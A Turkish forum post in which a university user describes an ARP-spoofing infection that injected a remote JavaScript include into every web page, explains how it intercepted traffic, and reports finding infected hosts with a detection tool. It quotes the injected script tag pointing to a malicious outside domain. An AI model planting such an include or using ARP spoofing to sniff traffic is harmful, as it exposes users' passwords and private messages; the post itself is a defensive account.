merhaba arkadaslar,
son bir kac aydır üniversitemizin tüm network'ünü duman eden bir virüs ile başımız dertte idi. antivirus programları bazı web sitelerine bağlanırken virüs bulundu (ANI.GEN , Trojan Downloader, Alman/NAB vs. gibi) uyarısı veriyor ancak pc'yi tarattığımızda hiç bir virüse rastlanmıyordu. işin ilginç yanı bir çok web sitesine bağlanırken html sayfasının kaynağını görüntüle dediğimizde aşağıdaki script kodunun eklendiğini gördük.
<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>
bir web sitesindeki (bazen bu adres 222360.com da olabiliyor) javascript dosyasını açmaya çalışıyordu virüs. ama işin ilginç olan yanı bilgisayarda virüs olmadığına emin olmamıza rağmen zaman zaman üstteki kodun girilen tüm sayfalarda çıkması idi. bu durumda bir kaç ihtimal kalıyordu. ağdaki trafiğe bir şekilde müdahale eden bir virüs söz konusu olmalıydı. virüs sadece yukardaki kodu girilen tüm sayfalara enjekte etmekle kalmıyor, ağda müthiş bir trafik oluşturuyor, internet bağlantısını yavaşlatıyor hatta çoğu zaman iptal ediyordu. internette forumlarda defalarca bu konuyu aradık, pek çok kişi aynı dertten muzdarip idi ancak bir çözüm yoktu. geçenlerde hindistan menşeili bir servis sağlayıcının benzer bir problemden dolayı müşterilerine sunduğu çözüme
ulaştım. virüsün olayı şu idi:
-arp spoofing (arp poisoning) adı verilen teknik ile switch tabanlı bir ağda kendisini gateway/router gibi tanıtıyordu
-böylece siz bir web sitesine bağlanmaya çalışınca gateway olarak virüslü bilgisayara bağlanıyordunuz
-o bilgisayarda ilgili web sitesini size gösterirken kendi kodunuda sayfanın en üstüne enjekte ediyordu
-tabi sizin tüm internet trafiğiniz virüslü o bilgisayar tarafından süzülüyordu bu da tüm şifre ve yazışmalarında süzüldüğü anlamına geliyor
çözüm ise basit: ağda gerçekten virüslü olan makineleri tespit edip virüslerini temizlemek. ancak üniversite gibi 1000lerce bilgisayarın buluduğu ve bir kontrolün olmadığı ortamlarda bunu yapmak pek pratik değil. ama hindu amcalar ufak bir
yazılım ile ağda arp spoofing yapan makinelerin iplerini tespit edebilmişler.
3-4 gündür bilgisayarımda bu yazılımı çalıştırarak virüslü bilgisayarları tespit etmeye çalışıyorum. bir bilgisayarı yakaladık ve virüsünü temizledik. şimdilik problemler azaldı ancak tamamen düzelmesi zaman alacak gibi görünüyor. virüsten muzdarip olanlara allah kolaylık versin diyorum.
bu arada bu virüsle ilgilenirken
arp spoofing olayını da inceledim. bu yöntemle ağdaki trafiği dinlemeniz (sniffing) mümkün. bağlanılan web sitelerini, ağdaki msn konuşmalarını hatta msn web cam görüntülerini yakalamak için onlarca yazılım olduğunu gördüm. ama bu iş çok sakat. her dakika ağda arp spoofing yapan varmı diye bakamayız ki? mahremiyet diye bişey kalmamış oluyor. bence antivirüs yazılımlarına bu özellik eklenmeli, ağda spoofing yapan makineleri tespit etmeli ve ona göre önlem almalı.